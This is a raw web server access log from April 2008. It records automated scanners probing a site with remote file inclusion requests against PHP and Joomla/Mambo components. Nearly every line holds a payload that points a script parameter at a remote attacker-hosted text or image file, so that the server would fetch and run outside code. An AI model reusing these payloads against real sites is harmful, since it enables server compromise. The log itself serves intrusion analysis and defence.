213.235.247.137 - - [29/Apr/2008:10:21:17 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.64.29 - - [29/Apr/2008:10:21:21 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [29/Apr/2008:10:21:21 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [29/Apr/2008:10:21:21 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:21:24 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:21:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:21:25 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.64.29 - - [29/Apr/2008:10:21:57 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:10 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:11 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:11 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:11 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:11 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:10:22:16 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:10:22:17 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:10:22:17 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:10:22:18 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.236.106 - - [29/Apr/2008:10:22:29 -0700] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cikal.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:22:36 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:22:37 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:22:37 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:22:44 -0700] "GET /logs/access_080312.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:22:45 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:22:45 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:22:47 -0700] "GET /logs/access_080130.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:22:48 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:22:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:22:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:51 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:22:52 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:10:22:59 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:10:22:59 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:12 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:12 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:12 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:23:16 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:23:16 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:23:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:17 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:17 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:23:17 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:23:20 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:23:21 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:23:21 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:23:28 -0700] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:31 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:31 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:32 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:23:32 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:23:36 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:23:37 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:23:37 -0700] "GET /logs/access_080229.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:23:39 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:40 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:40 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:23:40 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:23:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:10:23:42 -0700] "GET /logs/index.php?go=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:23:45 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:23:45 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:23:45 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:10:23:47 -0700] "GET /index.php?go=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:23:51 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:23:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:23:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:23:55 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:23:56 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:24:01 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [29/Apr/2008:10:24:01 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:24:09 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:10:24:18 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:10:24:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:10:24:19 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:24:21 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:24:28 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:24:32 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:24:32 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:24:33 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:24:33 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:24:37 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:24:38 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:24:38 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:24:38 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:24:39 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:10:24:42 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:24:51 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:24:52 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:24:53 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:24:53 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:24:53 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:24:57 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:25:04 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:10:25:06 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:10:25:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:10:25:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:25:21 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.36 - - [29/Apr/2008:10:25:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [29/Apr/2008:10:25:24 -0700] "GET /tmp/sess_ced7acfeb7d16602baf8a5e941bbb0b5 HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:25:25 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:25:31 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:25:33 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:25:40 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:25:41 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:10:25:54 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:10:25:54 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:25:58 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:25:58 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:25:58 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:10:25:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [29/Apr/2008:10:26:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:26:02 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:26:02 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:26:02 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:26:14 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:26:22 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
